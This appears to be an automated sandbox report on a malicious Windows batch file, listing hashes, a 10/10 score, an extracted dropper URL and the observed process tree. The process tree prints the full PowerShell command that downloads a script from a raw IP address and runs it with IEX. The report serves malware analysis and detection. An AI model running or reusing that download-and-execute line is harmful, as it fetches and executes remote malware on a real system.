Analysis
-
max time kernel
114s -
max time network
117s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
25-03-2020 21:10
Static task
static1
Behavioral task
behavioral1
Sample
sPECbGga.bat
Resource
win7v200217
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
sPECbGga.bat
Resource
win10v200217
windows10_x64
0 signatures
0 seconds
General
-
Target
sPECbGga.bat
-
Size
194B
-
MD5
d94d07f2df93865d06f702c261adb86c
-
SHA1
9ee4126797bb94f0395cca50216938d0e1c8d02b
-
SHA256
9ad514765ac2d6d77c2e2a5d645c162006849ba95b1c3cbb40377c2ec9a229e2
-
SHA512
1fa7ec3e2f2492fbdf85992aaee0db311410e627a2f63556facc24cd05efb08977ac14e7d06fee791f9dab9587f3b09b2333e03252fd6ecc1070c627365e4a14
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/sPECbGga
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3516 3992 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3516 WerFault.exe Token: SeBackupPrivilege 3516 WerFault.exe Token: SeDebugPrivilege 3516 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sPECbGga.bat"1⤵PID:3896
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/sPECbGga');Invoke-CCYOAPWUJOK;Start-Sleep -s 10000"2⤵PID:3992
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3516